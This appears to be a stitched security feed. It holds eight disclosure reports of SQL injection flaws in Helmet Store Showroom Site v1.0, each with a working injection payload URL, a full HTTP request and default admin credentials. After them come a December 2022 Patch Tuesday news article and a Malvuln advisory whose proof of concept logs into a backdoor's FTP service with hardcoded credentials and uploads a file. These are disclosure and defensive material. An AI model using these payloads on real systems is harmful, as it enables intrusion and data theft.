Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=client/manage_client&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

First execute the following sql statement in the database to create the clients table

CREATE TABLE \`clients\` (
  \`id\` int(11) NOT NULL,
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /hss/admin/?page=client/manage\_client&id=

Vulnerability location: /hss/admin/?page=client/manage\_client&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=client/manage\_client&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /hss/admin/?page\=client/manage\_client&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46125: bug_report/SQLi-10.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/categories/manage_category.php?id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/categories/manage\_category.php?id=

Vulnerability location: /hss/admin/categories/manage\_category.php?id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/categories/manage\_category.php?id=-5%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /hss/admin/categories/manage\_category.php?id\=\-5%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46123: bug_report/SQLi-7.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/categories/view_category.php?id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/categories/view\_category.php?id=

Vulnerability location: /hss/admin/categories/view\_category.php?id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/categories/view\_category.php?id=-5%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /hss/admin/categories/view\_category.php?id\=\-5%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46122: bug_report/SQLi-6.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=categories&c=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/?page=categories&c=

Vulnerability location: /hss/?page=categories&c=, c

dbname =hss\_db,length=6

\[+\] Payload: /hss/?page=categories&c=-2%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> c

GET /hss/?page\=categories&c\=\-2%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46119: bug_report/SQLi-3.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=product_per_brand&bid=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/?page=product\_per\_brand&bid=

Vulnerability location: /hss/?page=product\_per\_brand&bid=, id

dbname =hss\_db,length=6

\[+\] Payload: /hss/?page=product\_per\_brand&bid=-2%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> bid

GET /hss/?page\=product\_per\_brand&bid\=\-2%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46118: bug_report/SQLi-2.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=user/manage_user&id=.

Permalink

Cannot retrieve contributors at this time

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/?page=user/manage\_user&id=

Vulnerability location: /hss/admin/?page=user/manage\_user&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=user/manage\_user&id=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /hss/admin/?page\=user/manage\_user&id\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46124: bug_report/SQLi-9.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=products/view_product&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/?page=products/view\_product&id=

Vulnerability location: /hss/admin/?page=products/view\_product&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=products/view\_product&id=-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /hss/admin/?page\=products/view\_product&id\=\-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46120: bug_report/SQLi-4.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=products/manage_product&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/?page=products/manage\_product&id=

Vulnerability location: /hss/admin/?page=products/manage\_product&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=products/manage\_product&id=-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10--+ // Leak place ---> id

GET /hss/admin/?page\=products/manage\_product&id\=\-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46121: bug_report/SQLi-5.md at main · HMHYHM/bug_report

Microsoft has released its final monthly batch of security updates for 2022, fixing more than four dozen security holes in its various Windows operating systems and related software. The most pressing patches include a zero-day vulnerability in a Windows feature that tries to flag malicious files from the Web, a critical bug in PowerShell, and a dangerous flaw in Windows 11 systems that was detailed publicly prior to this week's Patch Tuesday.

**Microsoft** has released its final monthly batch of security updates for 2022, fixing more than four dozen security holes in its various **Windows** operating systems and related software. The most pressing patches include a zero-day in a Windows feature that tries to flag malicious files from the Web, a critical bug in **PowerShell**, and a dangerous flaw in **Windows 11** systems that was detailed publicly prior to this week’s Patch Tuesday.

The security updates include patches for **Azure**, **Microsoft Edge,** **Office**, **SharePoint Server**, **SysInternals**, and the **.NET framework**. Six of the update bundles earned Microsoft’s most dire “critical” rating, meaning they fix vulnerabilities that malware or malcontents can use to remotely commandeer an unpatched Windows system — with little to no interaction on the part of the user.

The bug already seeing exploitation is CVE-2022-44698, which allows attackers to bypass the Windows SmartScreen security feature. The vulnerability allows attackers to craft documents that won’t get tagged with Microsoft’s “Mark of the Web,” despite being downloaded from untrusted sites.

“This means no Protected View for Microsoft Office documents, making it easier to get users to do sketchy things like execute malicious macros,  
said **Greg Wiseman**, product manager at security firm **Rapid7**. This is the second Mark of the Web flaw Microsoft has patched in as many months; both were first publicly detailed over the past two months on Twitter by security researcher Will Dormann.

Publicly disclosed (but not actively exploited for now) is CVE-2022-44710, which is an elevation of privilege flaw in the DirectX graphics component of Windows 11.

Another notable critical bug is CVE-2022-41076, a remote code execution flaw in PowerShell — a key component of Windows that makes it easier to automate system tasks and configurations.

**Kevin Breen** at **Immersive Labs** said while Microsoft doesn’t share much detail about CVE-2022-41076 apart from the designation ‘Exploitation More Likely,’ they also note that successful exploitation requires an attacker to take additional actions to prepare the target environment.

“What actions are required is not clear; however, we do know that exploitation requires an authenticated user level of access,” Breen said. “This combination suggests that the exploit requires a social engineering element, and would likely be seen in initial infections using attacks like MalDocs or LNK files.”

Speaking of malicious documents, **Trend Micro’s Zero Day Initiative** highlights CVE-2022-44713, a spoofing vulnerability in **Outlook for Mac**.

“We don’t often highlight spoofing bugs, but anytime you’re dealing with a spoofing bug in an e-mail client, you should take notice,” ZDI’s **Dustin Childs** wrote. “This vulnerability could allow an attacker to appear as a trusted user when they should not be. Now combine this with the SmartScreen Mark of the Web bypass and it’s not hard to come up with a scenario where you receive an e-mail that appears to be from your boss with an attachment entitled “Executive\_Compensation.xlsx”. There aren’t many who wouldn’t open that file in that scenario.”

Microsoft also released guidance on reports that certain software drivers certified by Microsoft’s Windows Hardware Developer Program were being used maliciously in post-exploitation activity.

Three different companies reported evidence that malicious hackers were using these signed malicious driver files to lay the groundwork for ransomware deployment inside victim organizations. One of those companies, **Sophos**, published a blog post Tuesday detailing how the activity was tied to the Russian ransomware group **Cuba**, which has extorted an estimated $60 million from victims since 2019.

Of course, not all scary and pressing security threats are Microsoft-based. Also on Tuesday, **Apple** released a bevy of security updates to iOS, iPadOS, macOS, tvOS and Safari, including  a patch for a newly discovered zero-day vulnerability that could lead to remote code execution.

Anyone responsible for maintaining **Fortinet** or **Citrix** remote access products probably needs to update, as both are dealing with active attacks on just-patched flaws.

For a closer look at the patches released by Microsoft today (indexed by severity and other metrics) check out the always-useful Patch Tuesday roundup from the **SANS Internet Storm Center**. And it’s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: AskWoody.com usually has the lowdown on any patches that may be causing problems for Windows users.

As always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.

Microsoft Patch Tuesday, December 2022 Edition

Backdoor.Win32.InCommander.17.b malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022Original source: https://malvuln.com/advisory/dd76d8a5874bf8bf05279e35c68449ca.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnBackup media: infosec.exchange/@malvulnThreat: Backdoor.Win32.InCommander.17.bVulnerability: Hardcoded Cleartext CredentialsFamily: InCommanderType: PE32MD5: dd76d8a5874bf8bf05279e35c68449caVuln ID: MVID-2022-0665Dropped files: incsrv.exeDisclosure: 12/14/2022Description: The malware listens on TCP port 9400 and 9401 and requires authentication. However, the username "IncUser-b3" is stored in cleartext in a file named "incsrv.drv" under Windows dir. The password "InClientMainPassword" is also stored in cleartext but within the PE file "incsrv.exe" at offset 000958d0.Third-party adversaries may then upload thier own executables using ftp PASV, STOR commands.Exploit/PoC:C:\>nc64.exe 192.168.18.125 9401220 InCommad FTP Server ready.USER IncUser-b3331 Password required for IncUser-b3.PASS InClientMainPassword230 User IncUser-b3 logged in.SYST215 UNIX Type: L8 Internet Component SuitePASV227 Entering Passive Mode (192,168,18,125,241,155).CDUP \250 CWD command successful. "C:/" is current directory.STOR DOOM_SM.exe150 Opening data connection for DOOM_SM.exe.226 File received okfrom socket import *MALWARE_HOST="192.168.18.125"PORT=61851DOOM="DOOM_SM.exe"def doit():    s=socket(AF_INET, SOCK_STREAM)    s.connect((MALWARE_HOST, PORT))    f = open(DOOM, "rb")    EXE = f.read()    s.send(EXE)    while EXE:        s.send(EXE)        EXE=f.read()    s.close()    print("By Malvuln");if __name__=="__main__":    doit()Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Tag

#windows